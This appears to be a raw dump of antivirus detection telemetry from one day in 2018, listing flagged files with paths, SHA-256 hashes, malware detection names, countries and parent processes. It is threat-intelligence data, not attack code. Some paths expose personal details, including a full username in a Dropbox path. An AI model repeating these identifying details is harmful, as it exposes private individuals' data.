  Row(detection=Row(filename='powerups.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\powerups\\powerups.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151537-41d4c396', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151422-3AD18527\\AVSCAN-20181102-151537-41D4C396', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:15:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.589\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.589\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T09:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214612-8161eb3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-214348-640D9348\\AVSCAN-20181102-214612-8161EB3B', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0113233.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0113233.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instal_ivg2003.exe', filepath='D:\\WinMent\\Kit\\Documentatie\\05_solutii\\03_SALARII\\2003\\Fise fiscale 2003 kit finante\\instal_ivg2003.exe', filesize=1456000, name='TR/Patched.Gen.#M300.#R3374'), hash='2202132fdfe954d7db3c4ce2874721b1f05a4fa55249388276515ba3925f2a41', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:8CKaznjs9k+n4KvB.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:09:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[1].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[1].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:02:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084117-487ab35d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_829dd900\\AVSCAN-20181102-083922-3D2A618A\\AVSCAN-20181102-084117-487AB35D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:41:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0EAC87397CCF95D2F010A776B7DFDB718FE46B49511251AE348E303310F8915E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0eac87397ccf95d2f010a776b7dfdb718fe46b49511251ae348e303310f8915e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:26:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091501-17a93c27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88c5017b\\AVSCAN-20181102-091314-D8112D6C\\AVSCAN-20181102-091501-17A93C27', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='svchost.exe', filepath='\\?\\c:\\documents and settings\\X\\dane aplikacji\\29899417\\svchost.exe', filesize=320000, name='HEUR/AGEN.1004092.#M1.#R1'), hash='1e2ac26940534dcd587aef71a1b70ff53cfc8714cd59431ee5687493869d916d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:09:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='004280fb-f050-5b78-a67f-aeca8b48d242.exe', filepath='F:\\{8f874700-3975-f09f-45a5-4b73ad2651eb}\\004280fb-f050-5b78-a67f-aeca8b48d242.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:01:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa117380.17582\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa117380.17582\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:47:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050309-8fd5c9a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050309-8FD5C9A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050358-ad53132b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050358-AD53132B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054232-109e8d11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054232-109E8D11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100239-bd1ec16a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100239-BD1EC16A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052252-512f1dae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052252-512F1DAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050317-94a5ce55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050317-94A5CE55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161211-eefec283', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e150b8a2\\AVSCAN-20181102-161126-EADA5E2B\\AVSCAN-20181102-161211-EEFEC283', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:20:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051525-4663fb0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051525-4663FB0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='E:\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T08:50:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131726-d7cdd6e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-131726-D7CDD6E1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061216-37d32d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061216-37D32D63', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154807-67b0a4de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154807-67B0A4DE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061342-6b26753d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061342-6B26753D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053106-77af7837', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053106-77AF7837', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4b56f922fd9b0c4adb697ea3500f93d5e88ab0f090454c0677f42d94ccafd7cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\4B56F922FD9B0C4ADB697EA3500F93D5E88AB0F090454C0677F42D94CCAFD7CD', filesize=2112000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='4b56f922fd9b0c4adb697ea3500f93d5e88ab0f090454c0677f42d94ccafd7cd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashmemorytoolkit.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\FlashMemoryToolkit.exe', filesize=64000, name='TR/Siggen.rioid.#M1.#R1'), hash='5d45044066fc94a1558c3717b1bab84d8cfc17b7603b888168b9571f1b2b414e', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161131-6c9ef811', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-161131-6C9EF811', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061409-7b2a0557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061409-7B2A0557', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000092e', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp0000092e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:44:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wstqjmwg.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\wStQjMWg.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061044-0105acf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061044-0105ACF8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053624-34e0580d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053624-34E0580D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054717-ba25982f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054717-BA25982F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052409-7eefa489', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052409-7EEFA489', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061745-fbe2a211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061745-FBE2A211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:44Z'), dt=datetime.date(2018, 11, 2)),
